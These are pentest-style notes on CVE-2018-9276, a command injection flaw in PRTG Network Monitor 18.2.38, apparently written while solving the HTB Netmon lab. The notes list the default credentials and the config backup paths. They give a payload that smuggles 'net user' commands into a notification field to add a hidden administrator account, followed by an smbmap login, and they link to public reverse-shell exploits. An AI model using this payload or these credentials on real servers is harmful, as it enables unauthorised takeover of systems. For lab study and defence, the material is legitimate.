CVE-2018-9276

PRTG Network Monitor 18.2.38 - Remote Code Execution

PRTG Network Monitor 18.2.38 - Remote Code Execution - Windows

Vulnerability: (Authenticated) PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios.

PRTG Network Monitor - Default credentials --> prtgadmin/prtgadmin

If FTP open In \ProgramData\Paessler\PRTG Network Monitor, I’ll find information about the PRTG Network Monitor application:

Configuration Auto-Backups
PRTG Configuration.dat
PRTG Configuration.old.bak

Command Injection from web console:

#Create a user and give it admin priv
test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add
#login as the new user
smbmap -H 10.10.10.152 -u anon -p "p3nT3st!"

Score: CVSS v2.0: 9 // CVSS v3.x: 7.2

Shows on:

• HTB Netmon

POC:

PRTG < 18.2.39 Command Injection VulnerabilityCodeWatch

POC: Python / Msfvenom

GitHub - A1vinSmith/CVE-2018-9276: CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)GitHub

POC:

PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code ExecutionExploit Database

Resources:

https://vuldb.com/?id.120169=vuldb.com

NVD - CVE-2018-9276

CVE - CVE-2018-9276